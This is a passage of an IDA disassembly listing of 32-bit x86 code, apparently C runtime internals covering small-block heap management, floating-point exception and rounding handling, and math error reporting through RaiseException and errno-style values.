cmp esi, edx
jnb short loc_41BE44
cmp eax, [ebp+var_4]
jnz short loc_41BE00
mov [ecx+4], esi
jmp short loc_41BE0C
; ---------------------------------------------------------------------------
loc_41BE00: ; CODE XREF: sub_41BD88+71�j
sub [ebp+arg_4], esi
cmp [ebp+arg_4], edx
jb loc_41BEA5
loc_41BE0C: ; CODE XREF: sub_41BD88+76�j
mov edi, [ebp+var_4]
mov eax, ebx
jmp short loc_41BE18
; ---------------------------------------------------------------------------
loc_41BE13: ; CODE XREF: sub_41BD88+59�j
movzx esi, bl
add eax, esi
loc_41BE18: ; CODE XREF: sub_41BD88+89�j
lea esi, [eax+edx]
cmp esi, [ebp+arg_0]
jb short loc_41BDDD
loc_41BE20: ; CODE XREF: sub_41BD88+53�j
lea esi, [ecx+8]
loc_41BE23: ; CODE XREF: sub_41BD88+EB�j
; sub_41BD88+F2�j
cmp esi, edi
jnb short loc_41BEA5
lea eax, [esi+edx]
cmp eax, [ebp+arg_0]
jnb short loc_41BEA5
mov al, [esi]
test al, al
jnz short loc_41BE75
push 1
lea ebx, [esi+1]
pop eax
loc_41BE3B: ; CODE XREF: sub_41BD88+BA�j
cmp byte ptr [ebx], 0
jnz short loc_41BE65
inc ebx
inc eax
jmp short loc_41BE3B
; ---------------------------------------------------------------------------
loc_41BE44: ; CODE XREF: sub_41BD88+6C�j
lea ebx, [eax+edx]
cmp ebx, [ebp+arg_0]
jnb short loc_41BE55
sub esi, edx
mov [ecx], ebx
mov [ecx+4], esi
jmp short loc_41BE5E
; ---------------------------------------------------------------------------
loc_41BE55: ; CODE XREF: sub_41BD88+C2�j
and dword ptr [ecx+4], 0
lea esi, [ecx+8]
mov [ecx], esi
loc_41BE5E: ; CODE XREF: sub_41BD88+CB�j
mov [eax], dl
add eax, 8
jmp short loc_41BE9B
; ---------------------------------------------------------------------------
loc_41BE65: ; CODE XREF: sub_41BD88+B6�j
cmp eax, edx
jnb short loc_41BE7C
sub [ebp+arg_4], eax
cmp [ebp+arg_4], edx
jb short loc_41BEA5
mov esi, ebx
jmp short loc_41BE23
; ---------------------------------------------------------------------------
loc_41BE75: ; CODE XREF: sub_41BD88+AB�j
movzx eax, al
add esi, eax
jmp short loc_41BE23
; ---------------------------------------------------------------------------
loc_41BE7C: ; CODE XREF: sub_41BD88+DF�j
lea ebx, [esi+edx]
cmp ebx, [ebp+arg_0]
jnb short loc_41BE8D
sub eax, edx
mov [ecx], ebx
mov [ecx+4], eax
jmp short loc_41BE96
; ---------------------------------------------------------------------------
loc_41BE8D: ; CODE XREF: sub_41BD88+FA�j
and dword ptr [ecx+4], 0
lea eax, [ecx+8]
mov [ecx], eax
loc_41BE96: ; CODE XREF: sub_41BD88+103�j
mov [esi], dl
lea eax, [esi+8]
loc_41BE9B: ; CODE XREF: sub_41BD88+40�j
; sub_41BD88+DB�j
imul ecx, 0Fh
shl eax, 4
sub eax, ecx
jmp short loc_41BEA7
; ---------------------------------------------------------------------------
loc_41BEA5: ; CODE XREF: sub_41BD88+7E�j
; sub_41BD88+9D�j ...
xor eax, eax
loc_41BEA7: ; CODE XREF: sub_41BD88+11B�j
pop edi
pop esi
pop ebx
leave
retn
sub_41BD88 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41BEAC proc near ; CODE XREF: sub_41944F+19A�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ecx
mov edx, [ebp+arg_8]
push ebx
mov ebx, [ebp+arg_4]
push esi
movzx ecx, byte ptr [edx]
push edi
mov edi, [ebp+arg_0]
and [ebp+var_4], 0
mov eax, ebx
sub eax, [edi+10h]
sar eax, 0Ch
cmp ecx, [ebp+arg_C]
lea edi, [edi+eax*8+18h]
jbe short loc_41BEE6
mov eax, [ebp+arg_C]
sub ecx, eax
mov [edx], al
add [edi], ecx
mov dword ptr [edi+4], 0F1h
jmp short loc_41BF46
; ---------------------------------------------------------------------------
loc_41BEE6: ; CODE XREF: sub_41BEAC+26�j
jnb short loc_41BF4D
mov eax, [ebp+arg_C]
lea esi, [edx+eax]
lea eax, [ebx+0F8h]
cmp eax, esi
jb short loc_41BF4D
lea eax, [ecx+edx]
loc_41BEFB: ; CODE XREF: sub_41BEAC+59�j
cmp eax, esi
jnb short loc_41BF09
cmp byte ptr [eax], 0
jnz short loc_41BF07
inc eax
jmp short loc_41BEFB
; ---------------------------------------------------------------------------
loc_41BF07: ; CODE XREF: sub_41BEAC+56�j
cmp eax, esi
loc_41BF09: ; CODE XREF: sub_41BEAC+51�j
jnz short loc_41BF4D
mov al, byte ptr [ebp+arg_C]
mov [edx], al
mov eax, [ebx]
cmp edx, eax
ja short loc_41BF41
cmp esi, eax
jbe short loc_41BF41
lea eax, [ebx+0F8h]
cmp esi, eax
jnb short loc_41BF38
xor eax, eax
mov [ebx], esi
cmp [esi], al
jnz short loc_41BF33
loc_41BF2C: ; CODE XREF: sub_41BEAC+85�j
inc eax
cmp byte ptr [esi+eax], 0
jz short loc_41BF2C
loc_41BF33: ; CODE XREF: sub_41BEAC+7E�j
mov [ebx+4], eax
jmp short loc_41BF41
; ---------------------------------------------------------------------------
loc_41BF38: ; CODE XREF: sub_41BEAC+76�j
and dword ptr [ebx+4], 0
lea eax, [ebx+8]
mov [ebx], eax
loc_41BF41: ; CODE XREF: sub_41BEAC+68�j
; sub_41BEAC+6C�j ...
sub ecx, [ebp+arg_C]
add [edi], ecx
loc_41BF46: ; CODE XREF: sub_41BEAC+38�j
mov [ebp+var_4], 1
loc_41BF4D: ; CODE XREF: sub_41BEAC:loc_41BEE6�j
; sub_41BEAC+4A�j ...
mov eax, [ebp+var_4]
pop edi
pop esi
pop ebx
leave
retn
sub_41BEAC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __fastcall sub_41BF55(int,int,double,int)
sub_41BF55 proc near ; CODE XREF: sub_417CA4+51�p
; sub_417DEB+51�p
var_1C = qword ptr -1Ch
var_14 = qword ptr -14h
var_C = qword ptr -0Ch
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_C = dword ptr 14h
push ebp
mov ebp, esp
cmp ds:dword_43BF38, 0
jnz short loc_41BF8A
push [ebp+arg_C] ; int
fld qword ptr [ebp+arg_4]
push ecx
push ecx ; double
fstp [esp+0Ch+var_C]
push ecx ; int
push ecx ; int
fldz
fstp [esp+14h+var_14]
fld qword ptr [ebp+arg_4]
push ecx ; int
push ecx ; int
fstp [esp+1Ch+var_1C]
push [ebp+arg_0] ; int
push 1 ; int
call sub_41C50A
add esp, 24h
pop ebp
retn
; ---------------------------------------------------------------------------
loc_41BF8A: ; CODE XREF: sub_41BF55+A�j
push 0FFFFh
mov ds:dword_48A014, 21h
push [ebp+arg_C]
call sub_41C77D
fld qword ptr [ebp+arg_4]
pop ecx
pop ecx
pop ebp
retn
sub_41BF55 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_41BFA8(int,int,double,double,int)
sub_41BFA8 proc near ; CODE XREF: sub_417CA4:loc_417D67�p
; sub_417DEB:loc_417EAE�p
var_74 = qword ptr -74h
var_6C = qword ptr -6Ch
var_64 = qword ptr -64h
var_5C = dword ptr -5Ch
var_58 = byte ptr -58h
var_20 = dword ptr -20h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = qword ptr 10h
arg_10 = qword ptr 18h
arg_18 = dword ptr 20h
push ebp
mov ebp, esp
sub esp, 58h
push [ebp+arg_18]
lea eax, [ebp+arg_10]
push eax
push [ebp+arg_0]
call sub_41C2F3
add esp, 0Ch
test eax, eax
jnz short loc_41BFE6
lea eax, [ebp+arg_10]
and [ebp+var_20], 0FFFFFFFEh
push eax
lea eax, [ebp+arg_8]
push eax
lea eax, [ebp+arg_18]
push [ebp+arg_4]
push [ebp+arg_0]
push eax
lea eax, [ebp+var_58]
push eax
call sub_41C040
add esp, 18h
loc_41BFE6: ; CODE XREF: sub_41BFA8+1A�j
push [ebp+arg_0]
call sub_41C5DD
cmp ds:dword_43BF38, 0
pop ecx
jnz short loc_41C024
test eax, eax
jz short loc_41C024
push [ebp+arg_18] ; int
fld [ebp+arg_10]
push ecx
push ecx ; double
fstp [esp+64h+var_64]
push ecx ; int
push ecx ; int
fldz
fstp [esp+6Ch+var_6C]
fld [ebp+arg_8]
push ecx ; int
push ecx ; int
fstp [esp+74h+var_74]
push [ebp+arg_4] ; int
push eax ; int
call sub_41C50A
add esp, 24h
leave
retn
; ---------------------------------------------------------------------------
loc_41C024: ; CODE XREF: sub_41BFA8+4E�j
; sub_41BFA8+52�j
push eax
call sub_41C592
mov [esp+5Ch+var_5C], 0FFFFh
push [ebp+arg_18]
call sub_41C77D
fld [ebp+arg_10]
pop ecx
pop ecx
leave
retn
sub_41BFA8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41C040 proc near ; CODE XREF: sub_41BFA8+36�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
mov ecx, [ebp+arg_0]
xor eax, eax
push ebx
push esi
mov [ecx+4], eax
mov ecx, [ebp+arg_0]
push edi
push 1
mov [ecx+8], eax
mov ecx, [ebp+arg_0]
pop ebx
mov [ecx+0Ch], eax
mov cl, byte ptr [ebp+arg_8]
test cl, 10h
jz short loc_41C072
mov eax, [ebp+arg_0]
mov [ebp+arg_8], 0C000008Fh
or [eax+4], ebx
loc_41C072: ; CODE XREF: sub_41C040+23�j
test cl, 2
jz short loc_41C085
mov eax, [ebp+arg_0]
mov [ebp+arg_8], 0C0000093h
or dword ptr [eax+4], 2
loc_41C085: ; CODE XREF: sub_41C040+35�j
test cl, bl
jz short loc_41C097
mov eax, [ebp+arg_0]
mov [ebp+arg_8], 0C0000091h
or dword ptr [eax+4], 4
loc_41C097: ; CODE XREF: sub_41C040+47�j
test cl, 4
jz short loc_41C0AA
mov eax, [ebp+arg_0]
mov [ebp+arg_8], 0C000008Eh
or dword ptr [eax+4], 8
loc_41C0AA: ; CODE XREF: sub_41C040+5A�j
test cl, 8
jz short loc_41C0BD
mov eax, [ebp+arg_0]
mov [ebp+arg_8], 0C0000090h
or dword ptr [eax+4], 10h
loc_41C0BD: ; CODE XREF: sub_41C040+6D�j
mov esi, [ebp+arg_4]
mov eax, [ebp+arg_0]
push 2
mov ecx, [esi]
mov edx, [eax+8]
not ecx
and ecx, ebx
and edx, 0FFFFFFEFh
shl ecx, 4
or ecx, edx
pop edi
mov [eax+8], ecx
mov ecx, [esi]
mov eax, [ebp+arg_0]
not ecx
mov edx, [eax+8]
and ecx, 4
shl ecx, 1
and edx, 0FFFFFFF7h
or ecx, edx
mov [eax+8], ecx
mov ecx, [esi]
mov eax, [ebp+arg_0]
not ecx
mov edx, [eax+8]
shr ecx, 1
and ecx, 4
and edx, 0FFFFFFFBh
or ecx, edx
mov [eax+8], ecx
mov ecx, [esi]
mov eax, [ebp+arg_0]
not ecx
mov edx, [eax+8]
shr ecx, 3
and ecx, edi
and edx, 0FFFFFFFDh
or ecx, edx
mov [eax+8], ecx
mov ecx, [esi]
mov eax, [ebp+arg_0]
not ecx
mov edx, [eax+8]
shr ecx, 5
and ecx, ebx
and edx, 0FFFFFFFEh
or ecx, edx
mov [eax+8], ecx
call sub_41C760
test al, bl
jz short loc_41C146
mov ecx, [ebp+arg_0]
or dword ptr [ecx+0Ch], 10h
loc_41C146: ; CODE XREF: sub_41C040+FD�j
test al, 4
jz short loc_41C151
mov ecx, [ebp+arg_0]
or dword ptr [ecx+0Ch], 8
loc_41C151: ; CODE XREF: sub_41C040+108�j
test al, 8
jz short loc_41C15C
mov ecx, [ebp+arg_0]
or dword ptr [ecx+0Ch], 4
loc_41C15C: ; CODE XREF: sub_41C040+113�j
test al, 10h
jz short loc_41C166
mov ecx, [ebp+arg_0]
or [ecx+0Ch], edi
loc_41C166: ; CODE XREF: sub_41C040+11E�j
test al, 20h
jz short loc_41C170
mov eax, [ebp+arg_0]
or [eax+0Ch], ebx
loc_41C170: ; CODE XREF: sub_41C040+128�j
mov eax, [esi]
mov ecx, 0C00h
and eax, ecx
jz short loc_41C1AF
cmp eax, 400h
jz short loc_41C1A1
cmp eax, 800h
jz short loc_41C195
cmp eax, ecx
jnz short loc_41C1B5
mov eax, [ebp+arg_0]
or dword ptr [eax], 3
jmp short loc_41C1B5
; ---------------------------------------------------------------------------
loc_41C195: ; CODE XREF: sub_41C040+147�j
mov eax, [ebp+arg_0]
mov ecx, [eax]
and ecx, 0FFFFFFFEh
or ecx, edi
jmp short loc_41C1AB
; ---------------------------------------------------------------------------
loc_41C1A1: ; CODE XREF: sub_41C040+140�j
mov eax, [ebp+arg_0]
mov ecx, [eax]
and ecx, 0FFFFFFFDh
or ecx, ebx
loc_41C1AB: ; CODE XREF: sub_41C040+15F�j
mov [eax], ecx
jmp short loc_41C1B5
; ---------------------------------------------------------------------------
loc_41C1AF: ; CODE XREF: sub_41C040+139�j
mov eax, [ebp+arg_0]
and dword ptr [eax], 0FFFFFFFCh
loc_41C1B5: ; CODE XREF: sub_41C040+14B�j
; sub_41C040+153�j ...
mov eax, [esi]
mov ecx, 300h
and eax, ecx
jz short loc_41C1E0
cmp eax, 200h
jz short loc_41C1D3
cmp eax, ecx
jnz short loc_41C1ED
mov eax, [ebp+arg_0]
and dword ptr [eax], 0FFFFFFE3h
jmp short loc_41C1ED
; ---------------------------------------------------------------------------
loc_41C1D3: ; CODE XREF: sub_41C040+185�j
mov eax, [ebp+arg_0]
mov ecx, [eax]
and ecx, 0FFFFFFE7h
or ecx, 4
jmp short loc_41C1EB
; ---------------------------------------------------------------------------
loc_41C1E0: ; CODE XREF: sub_41C040+17E�j
mov eax, [ebp+arg_0]
mov ecx, [eax]
and ecx, 0FFFFFFEBh
or ecx, 8
loc_41C1EB: ; CODE XREF: sub_41C040+19E�j
mov [eax], ecx
loc_41C1ED: ; CODE XREF: sub_41C040+189�j
; sub_41C040+191�j
mov eax, [ebp+arg_0]
mov ecx, [ebp+arg_C]
and ecx, 0FFFh
mov edx, [eax]
shl ecx, 5
and edx, 0FFFE001Fh
or ecx, edx
mov [eax], ecx
mov eax, [ebp+arg_0]
or [eax+20h], ebx
mov eax, [ebp+arg_0]
mov ecx, [eax+20h]
and ecx, 0FFFFFFE3h
or ecx, edi
mov [eax+20h], ecx
mov eax, [ebp+arg_10]
fld qword ptr [eax]
mov eax, [ebp+arg_0]
fstp qword ptr [eax+10h]
mov eax, [ebp+arg_0]
or [eax+50h], ebx
mov eax, [ebp+arg_0]
mov ecx, [eax+50h]
and ecx, 0FFFFFFE3h
or ecx, edi
mov edi, [ebp+arg_14]
mov [eax+50h], ecx
mov eax, [ebp+arg_0]
fld qword ptr [edi]
fstp qword ptr [eax+40h]
call sub_41C76E
lea eax, [ebp+arg_0]
push eax
push ebx
push 0
push [ebp+arg_8]
call ds:dword_4241BC ; RaiseException
mov eax, [ebp+arg_0]
test byte ptr [eax+8], 10h
jz short loc_41C267
and dword ptr [esi], 0FFFFFFFEh
loc_41C267: ; CODE XREF: sub_41C040+222�j
test byte ptr [eax+8], 8
jz short loc_41C270
and dword ptr [esi], 0FFFFFFFBh
loc_41C270: ; CODE XREF: sub_41C040+22B�j
test byte ptr [eax+8], 4
jz short loc_41C279
and dword ptr [esi], 0FFFFFFF7h
loc_41C279: ; CODE XREF: sub_41C040+234�j
test byte ptr [eax+8], 2
jz short loc_41C282
and dword ptr [esi], 0FFFFFFEFh
loc_41C282: ; CODE XREF: sub_41C040+23D�j
test [eax+8], bl
jz short loc_41C28A
and dword ptr [esi], 0FFFFFFDFh
loc_41C28A: ; CODE XREF: sub_41C040+245�j
mov ecx, [eax]
mov edx, 0FFFFF3FFh
and ecx, 3
sub ecx, 0
jz short loc_41C2BE
dec ecx
jz short loc_41C2B2
dec ecx
jz short loc_41C2A8
dec ecx
jnz short loc_41C2C0
or byte ptr [esi+1], 0Ch
jmp short loc_41C2C0
; ---------------------------------------------------------------------------
loc_41C2A8: ; CODE XREF: sub_41C040+25D�j
mov ecx, [esi]
and ch, 0FBh
or ch, 8
jmp short loc_41C2BA
; ---------------------------------------------------------------------------
loc_41C2B2: ; CODE XREF: sub_41C040+25A�j
mov ecx, [esi]
and ch, 0F7h
or ch, 4
loc_41C2BA: ; CODE XREF: sub_41C040+270�j
mov [esi], ecx
jmp short loc_41C2C0
; ---------------------------------------------------------------------------
loc_41C2BE: ; CODE XREF: sub_41C040+257�j
and [esi], edx
loc_41C2C0: ; CODE XREF: sub_41C040+260�j
; sub_41C040+266�j ...
mov ecx, [eax]
shr ecx, 2
and ecx, 7
sub ecx, 0
jz short loc_41C2E0
dec ecx
jz short loc_41C2D7
dec ecx
jnz short loc_41C2E9
and [esi], edx
jmp short loc_41C2E9
; ---------------------------------------------------------------------------
loc_41C2D7: ; CODE XREF: sub_41C040+28E�j
mov ecx, [esi]
and ecx, edx
or ch, 2
jmp short loc_41C2E7
; ---------------------------------------------------------------------------
loc_41C2E0: ; CODE XREF: sub_41C040+28B�j
mov ecx, [esi]
and ecx, edx
or ch, 3
loc_41C2E7: ; CODE XREF: sub_41C040+29E�j
mov [esi], ecx
loc_41C2E9: ; CODE XREF: sub_41C040+291�j
; sub_41C040+295�j
fld qword ptr [eax+40h]
fstp qword ptr [edi]
pop edi
pop esi
pop ebx
pop ebp
retn
sub_41C040 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41C2F3 proc near ; CODE XREF: sub_41BFA8+10�p
var_24 = qword ptr -24h
var_C = qword ptr -0Ch
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 0Ch
mov eax, [ebp+arg_0]
push ebx
push edi
mov edi, eax
and edi, 1Fh
push 1
test al, 8
pop ebx
jz short loc_41C31E
test byte ptr [ebp+arg_8], bl
jz short loc_41C31E
push ebx
call sub_41C7A0
pop ecx
and edi, 0FFFFFFF7h
jmp loc_41C4E8
; ---------------------------------------------------------------------------
loc_41C31E: ; CODE XREF: sub_41C2F3+15�j
; sub_41C2F3+1A�j
test al, 4
jz short loc_41C338
test byte ptr [ebp+arg_8], 4
jz short loc_41C338
push 4
call sub_41C7A0
pop ecx
and edi, 0FFFFFFFBh
jmp loc_41C4E8
; ---------------------------------------------------------------------------
loc_41C338: ; CODE XREF: sub_41C2F3+2D�j
; sub_41C2F3+33�j
test al, bl
jz loc_41C412
test byte ptr [ebp+arg_8], 8
jz loc_41C412
push 8
call sub_41C7A0
pop ecx
mov eax, 0C00h
mov ecx, [ebp+arg_8]
and ecx, eax
jz loc_41C3EA
cmp ecx, 400h
jz short loc_41C3C2
cmp ecx, 800h
jz short loc_41C39A
cmp ecx, eax
jnz loc_41C40A
mov ecx, [ebp+arg_4]
fld qword ptr [ecx]
fcomp ds:dbl_424818
fld ds:dbl_43B8D0
fnstsw ax
sahf
ja short loc_41C392
fchs
loc_41C392: ; CODE XREF: sub_41C2F3+9B�j
fstp [ebp+var_C]
fld [ebp+var_C]
jmp short loc_41C408
; ---------------------------------------------------------------------------
loc_41C39A: ; CODE XREF: sub_41C2F3+7D�j
mov ecx, [ebp+arg_4]
fld qword ptr [ecx]
fcomp ds:dbl_424818
fnstsw ax
sahf
jbe short loc_41C3B2
fld ds:dbl_43B8C0
jmp short loc_41C3BA
; ---------------------------------------------------------------------------
loc_41C3B2: ; CODE XREF: sub_41C2F3+B5�j
fld ds:dbl_43B8D0
fchs
loc_41C3BA: ; CODE XREF: sub_41C2F3+BD�j
fstp [ebp+var_C]
fld [ebp+var_C]
jmp short loc_41C408
; ---------------------------------------------------------------------------
loc_41C3C2: ; CODE XREF: sub_41C2F3+75�j
mov ecx, [ebp+arg_4]
fld qword ptr [ecx]
fcomp ds:dbl_424818
fnstsw ax
sahf
jbe short loc_41C3DA
fld ds:dbl_43B8D0
jmp short loc_41C3E2
; ---------------------------------------------------------------------------
loc_41C3DA: ; CODE XREF: sub_41C2F3+DD�j
fld ds:dbl_43B8C0
fchs
loc_41C3E2: ; CODE XREF: sub_41C2F3+E5�j
fstp [ebp+var_C]
fld [ebp+var_C]
jmp short loc_41C408
; ---------------------------------------------------------------------------
loc_41C3EA: ; CODE XREF: sub_41C2F3+69�j
mov ecx, [ebp+arg_4]
fld qword ptr [ecx]
fcomp ds:dbl_424818
fld ds:dbl_43B8C0
fnstsw ax
sahf
ja short loc_41C402
fchs
loc_41C402: ; CODE XREF: sub_41C2F3+10B�j
fstp [ebp+var_C]
fld [ebp+var_C]
loc_41C408: ; CODE XREF: sub_41C2F3+A5�j
; sub_41C2F3+CD�j ...
fstp qword ptr [ecx]
loc_41C40A: ; CODE XREF: sub_41C2F3+81�j
and edi, 0FFFFFFFEh
jmp loc_41C4E8
; ---------------------------------------------------------------------------
loc_41C412: ; CODE XREF: sub_41C2F3+47�j
; sub_41C2F3+51�j
test al, 2
jz loc_41C4E8
test byte ptr [ebp+arg_8], 10h
jz loc_41C4E8
push esi
xor esi, esi
test al, 10h
jz short loc_41C42D
mov esi, ebx
loc_41C42D: ; CODE XREF: sub_41C2F3+136�j
mov eax, [ebp+arg_4]
fld qword ptr [eax]
fstp [ebp+var_C]
fld [ebp+var_C]
fcomp ds:dbl_424818
fnstsw ax
sahf
jz loc_41C4D6
fld [ebp+var_C]
lea eax, [ebp+var_4]
push eax ; int
push ecx
push ecx ; double
fstp [esp+24h+var_24]
call sub_41C69F
mov eax, [ebp+var_4]
add esp, 0Ch
fstp [ebp+var_C]
lea ecx, [eax-600h]
cmp ecx, 0FFFFFBCEh
jge short loc_41C478
fldz
mov esi, ebx
fstp [ebp+var_C]
jmp short loc_41C4CC
; ---------------------------------------------------------------------------
loc_41C478: ; CODE XREF: sub_41C2F3+17A�j
fld [ebp+var_C]
fcomp ds:dbl_424818
fnstsw ax
sahf
jnb short loc_41C48A
mov edx, ebx
jmp short loc_41C48C
; ---------------------------------------------------------------------------
loc_41C48A: ; CODE XREF: sub_41C2F3+191�j
xor edx, edx
loc_41C48C: ; CODE XREF: sub_41C2F3+195�j
mov al, byte ptr [ebp+var_C+6]
and eax, 0Fh
or al, 10h
mov word ptr [ebp+var_C+6], ax
mov eax, 0FFFFFC03h
cmp ecx, eax
jge short loc_41C4C0
sub eax, ecx
loc_41C4A3: ; CODE XREF: sub_41C2F3+1CB�j
test byte ptr [ebp+var_C], bl
jz short loc_41C4AE
test esi, esi
jnz short loc_41C4AE
mov esi, ebx
loc_41C4AE: ; CODE XREF: sub_41C2F3+1B3�j
; sub_41C2F3+1B7�j
shr dword ptr [ebp+var_C], 1
test byte ptr [ebp+var_C+4], bl
jz short loc_41C4BA
or byte ptr [ebp+var_C+3], 80h
loc_41C4BA: ; CODE XREF: sub_41C2F3+1C1�j
shr dword ptr [ebp+var_C+4], 1
dec eax
jnz short loc_41C4A3
loc_41C4C0: ; CODE XREF: sub_41C2F3+1AC�j
test edx, edx
jz short loc_41C4CC
fld [ebp+var_C]
fchs
fstp [ebp+var_C]
loc_41C4CC: ; CODE XREF: sub_41C2F3+183�j
; sub_41C2F3+1CF�j
fld [ebp+var_C]
mov eax, [ebp+arg_4]
fstp qword ptr [eax]
jmp short loc_41C4D8
; ---------------------------------------------------------------------------
loc_41C4D6: ; CODE XREF: sub_41C2F3+14E�j
mov esi, ebx
loc_41C4D8: ; CODE XREF: sub_41C2F3+1E1�j
test esi, esi
pop esi
jz short loc_41C4E5
push 10h
call sub_41C7A0
pop ecx
loc_41C4E5: ; CODE XREF: sub_41C2F3+1E8�j
and edi, 0FFFFFFFDh
loc_41C4E8: ; CODE XREF: sub_41C2F3+26�j
; sub_41C2F3+40�j ...
test byte ptr [ebp+arg_0], 10h
jz short loc_41C4FF
test byte ptr [ebp+arg_8], 20h
jz short loc_41C4FF
push 20h
call sub_41C7A0
pop ecx
and edi, 0FFFFFFEFh
loc_41C4FF: ; CODE XREF: sub_41C2F3+1F9�j
; sub_41C2F3+1FF�j
xor eax, eax
test edi, edi
pop edi
pop ebx
setz al
leave
retn
sub_41C2F3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_41C50A(int,int,int,int,int,int,double,int)
sub_41C50A proc near ; CODE XREF: sub_41BF55+2B�p
; sub_41BFA8+72�p
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = qword ptr -8
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = qword ptr 20h
arg_20 = dword ptr 28h
push ebp
mov ebp, esp
sub esp, 20h
push [ebp+arg_4]
call sub_41C5B8
test eax, eax
pop ecx
mov [ebp+var_1C], eax
jz short loc_41C575
mov eax, [ebp+arg_8]
push esi
mov [ebp+var_18], eax
mov eax, [ebp+arg_C]
mov [ebp+var_14], eax
mov eax, [ebp+arg_10]
mov esi, [ebp+arg_0]
mov [ebp+var_10], eax
mov eax, [ebp+arg_14]
push 0FFFFh
push [ebp+arg_20]
mov [ebp+var_C], eax
mov eax, dword ptr [ebp+arg_18]
mov [ebp+var_20], esi
mov dword ptr [ebp+var_8], eax
mov eax, dword ptr [ebp+arg_18+4]
mov dword ptr [ebp+var_8+4], eax
call sub_41C77D
lea eax, [ebp+var_20]
push eax
call sub_42017F
add esp, 0Ch
test eax, eax
jnz short loc_41C56F
push esi
call sub_41C592
pop ecx
loc_41C56F: ; CODE XREF: sub_41C50A+5C�j
fld [ebp+var_8]
pop esi
leave
retn
; ---------------------------------------------------------------------------
loc_41C575: ; CODE XREF: sub_41C50A+14�j
push 0FFFFh
push [ebp+arg_20]
call sub_41C77D
push [ebp+arg_0]
call sub_41C592
fld [ebp+arg_18]
add esp, 0Ch
leave
retn
sub_41C50A endp
; =============== S U B R O U T I N E =======================================
sub_41C592 proc near ; CODE XREF: sub_41BFA8+7D�p
; sub_41C50A+5F�p ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
cmp eax, 1
jz short loc_41C5AD
jle short locret_41C5B7
cmp eax, 3
jg short locret_41C5B7
mov ds:dword_48A014, 22h
retn
; ---------------------------------------------------------------------------
loc_41C5AD: ; CODE XREF: sub_41C592+7�j
mov ds:dword_48A014, 21h
locret_41C5B7: ; CODE XREF: sub_41C592+9�j
; sub_41C592+E�j
retn
sub_41C592 endp
; =============== S U B R O U T I N E =======================================
sub_41C5B8 proc near ; CODE XREF: sub_41C50A+9�p
arg_0 = dword ptr 4
xor ecx, ecx
mov eax, offset dword_43B7E8
loc_41C5BF: ; CODE XREF: sub_41C5B8+18�j
mov edx, [eax]
cmp edx, [esp+arg_0]
jz short loc_41C5D5
add eax, 8
inc ecx
cmp eax, offset dbl_43B8C0
jl short loc_41C5BF
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_41C5D5: ; CODE XREF: sub_41C5B8+D�j
mov eax, ds:off_43B7EC[ecx*8]
retn
sub_41C5B8 endp
; =============== S U B R O U T I N E =======================================
sub_41C5DD proc near ; CODE XREF: sub_41BFA8+41�p
arg_0 = byte ptr 4
mov al, [esp+arg_0]
test al, 20h
jz short loc_41C5E9
push 5
jmp short loc_41C5FF
; ---------------------------------------------------------------------------
loc_41C5E9: ; CODE XREF: sub_41C5DD+6�j
test al, 8
jz short loc_41C5F1
push 1
jmp short loc_41C5FF
; ---------------------------------------------------------------------------
loc_41C5F1: ; CODE XREF: sub_41C5DD+E�j
test al, 4
jz short loc_41C5F9
push 2
jmp short loc_41C5FF
; ---------------------------------------------------------------------------
loc_41C5F9: ; CODE XREF: sub_41C5DD+16�j
test al, 1
jz short loc_41C601
push 3
loc_41C5FF: ; CODE XREF: sub_41C5DD+A�j
; sub_41C5DD+12�j ...
pop eax
retn
; ---------------------------------------------------------------------------
loc_41C601: ; CODE XREF: sub_41C5DD+1E�j
movzx eax, al
and eax, 2
shl eax, 1
retn
sub_41C5DD endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_41C60A(double)
sub_41C60A proc near ; CODE XREF: sub_417CA4:loc_417D2A�p
; sub_417DEB:loc_417E71�p
var_8 = qword ptr -8
arg_0 = qword ptr 8
push ebp
mov ebp, esp
push ecx
push ecx
fld [ebp+arg_0]
frndint
fstp [ebp+var_8]
fld [ebp+var_8]
leave
retn
sub_41C60A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_41C61C(double,int)
sub_41C61C proc near ; CODE XREF: sub_41C69F+82�p
; sub_41C69F+98�p
var_8 = qword ptr -8
arg_0 = qword ptr 8
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
push ecx
mov eax, [ebp+arg_8]
mov ecx, [ebp+0Eh]
fld [ebp+arg_0]
add eax, 3FEh
and cx, 800Fh
fstp [ebp+var_8]
shl eax, 4
or eax, ecx
mov word ptr [ebp+var_8+6], ax
fld [ebp+var_8]
leave
retn
sub_41C61C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41C645 proc near ; CODE XREF: sub_417CA4+31�p
; sub_417DEB+31�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
xor edx, edx
cmp [ebp+arg_4], 7FF00000h
jnz short loc_41C65C
cmp [ebp+arg_0], edx
jnz short loc_41C66E
push 1
